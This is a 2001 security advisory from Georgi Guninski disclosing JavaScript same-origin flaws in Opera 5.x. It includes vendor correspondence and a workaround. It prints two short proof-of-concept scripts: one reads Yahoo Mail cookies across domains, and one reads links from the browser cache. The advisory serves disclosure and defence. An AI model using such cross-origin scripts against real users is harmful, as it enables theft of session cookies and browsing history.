Georgi Guninski security advisory #51, 2001

Several javascript vulnerabilities in Opera

Systems affected:
Opera 5.12/Windows, Opera 5.0/Linux - probably other versions

Risk: Medium
Date: 15 November 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false. The opinions expressed in this
advisory and program are my own and not of any company. The usual
standard disclaimer applies, especially the fact that Georgi Guninski is
not liable for any damages caused by direct or indirect use of the
information or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this
advisory or program or any derivatives thereof.

Anouncement:
I am looking for contracts in the security area - check
http://www.guninski.com

Description:
Opera is a multiplatform web browser.
There are several javascript vulnerabilities in it, basically allowing
script in a page to access a page and its properties in another domain -
AFAIK Netscape call this "Same Origin Vulnerability".
It is possible a script in web page to access at least cookies and links
in arbitrary domains to which the user has access. It is also possible a
script to read the the links in the user's cache and
history which at least have privacy implications if not more. In some
cases cookies and links in the cahe/history may containg sensitive
information such as usernames/passwords etc.

Details:
Examine the following scripts:
-1.----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.co
m');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------

-2.--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------

In addiotion the HotJava explot at
http://www.guninski.com/hotjava1-desc.html works as JayInfoAve.net
pointed out.

Workaround:
Disable javascript (Opera suggest enabling "Use cookies to trace
password protected documents")

Vendor status:
The vendor was notified on 5 November 2001 and was asked whether a fix
shall be issued and when. The reply was:
------------------------------------
You should be able to resolve the cookie issue by enabling "Use cookies
to trace password protected documents",
which means that pages with password protection aren't cached, cookies
aren't stored,
the URL shouldn't be displayed in History, etc.
This is a "paranoia" option, and makes a few pages unusable.
As you are probably aware, many web technologies aren't very secure,
but it is inconvenient for the user to block these.
This is why the user should be given a choice to block privacy related
information.
------------------------------------

Regards,
Georgi Guninski
http://www.guninski.com
----------------------
You may visit Guninski Security Mailing List page at
http://www.guninski.com/mailinglist.html
----------------------

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]